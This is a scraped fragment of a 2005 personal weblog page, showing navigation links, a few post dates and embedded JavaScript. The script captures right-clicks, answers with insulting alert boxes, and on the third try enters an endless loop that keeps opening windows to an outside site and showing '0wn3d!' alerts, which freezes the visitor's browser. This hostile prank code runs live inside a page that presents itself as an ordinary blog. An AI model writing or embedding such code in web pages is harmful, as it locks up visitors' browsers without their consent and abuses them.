| cheesehead51592: weblog - photos - videos - audio - pulse - profile - subscribe! |
|
Tuesday, September 20, 2005
Thursday, September 15, 2005
Thursday, August 25, 2005
|
|
| function rightClicked(){ if (times>1) { alert ("OH NO!! OH NO!!"); while (1==1) { window.open('http://www.zipit.tk'); alert('0wn3d!'); } } if (times==1) { alert("BIZZATCH TRY THAT AGAIN! XD"); times++ } if (times<1) { alert("WHAT NOW BITCH!?"); times++ } } function clickIE4(){ if (event.button==2){ rightClicked(); return false; } } function clickNS4(e){ if (document.layers||document.getElementById&&!document.all){ if (e.which==2||e.which==3){ rightClicked(); return false; } } } if (document.layers){ document.captureEvents(Event.MOUSEDOWN); document.onmousedown=clickNS4; } else if (document.all&&!document.getElementById){ document.onmousedown=clickIE4; } document.oncontextmenu=new Function("rightClicked();return false") |